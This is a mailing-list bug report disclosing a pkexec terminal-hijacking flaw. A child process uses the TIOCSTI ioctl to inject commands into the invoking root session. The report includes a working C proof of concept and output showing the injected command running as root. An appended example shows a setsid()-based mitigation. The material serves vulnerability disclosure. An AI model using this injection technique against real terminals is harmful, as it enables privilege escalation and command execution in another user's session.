[Pkg-utopia-maintainers] Bug#812512: pkexec tty hijacking via TIOCSTI ioctl
up201407890 at alunos.dcc.fc.up.pt
Sun Jan 24 15:08:57 UTC 2016
Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec
When executing a program via "pkexec --user nonpriv program" the
nonpriv session can escape to the parent session by using the TIOCSTI
ioctl to push characters into the terminal's input buffer, allowing
privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid()
and in "sudo" by using the "use_pty" flag.
$ cat test.c
#include <sys/ioctl.h>
int main()
{
    char *cmd = "id\n";
    while(*cmd)
        ioctl(0, TIOCSTI, cmd++);
}
$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)
# pkexec --user saken ./test ----> last command I type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)
I don't believe any of the previous mentions of fixes for "su" and
"sudo" work here, since executing a shell via pkexec would make it not
have job control.
I'm also requesting a CVE for this issue.
Thanks,
Federico Bento
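As an added example, not taken from the report or from PolicyKit, here is the su-style setsid() mitigation the report mentions, written as a hypothetical wrapper (the function names run_detached, has_controlling_tty and setsid_detaches are assumptions, not pkexec's code). It shows why detaching the child from the controlling terminal blocks TIOCSTI, and carries the report's caveat that such a child has no job control.

```c
#include <fcntl.h>
#include <sys/wait.h>
#include <unistd.h>

/* 1 if this process has a controlling tty, else 0. /dev/tty names the
 * controlling tty; open() fails with ENXIO when there is none. */
int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* Hypothetical su-style wrapper (not pkexec's actual fix): setsid() in the
 * child drops its controlling tty before exec. The kernel's TIOCSTI handler
 * returns EPERM when the caller's controlling tty is not the target tty and
 * it lacks CAP_SYS_ADMIN, so the child cannot inject keystrokes. Cost: no job control. */
int run_detached(char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0)   /* fails only if already a session leader */
            _exit(127);
        execvp(argv[0], argv);
        _exit(127);         /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Checks the premise: after setsid() in a fresh child, no controlling tty
 * remains. Returns 1 if the child ended up detached, 0 otherwise. */
int setsid_detaches(void)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return 0;
    if (pid == 0)
        _exit(setsid() < 0 ? 2 : has_controlling_tty());
    if (waitpid(pid, &status, 0) < 0)
        return 0;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
```

Run from an interactive shell, a program started through run_detached gets EPERM from ioctl(0, TIOCSTI, ...) instead of queueing input on the invoking terminal.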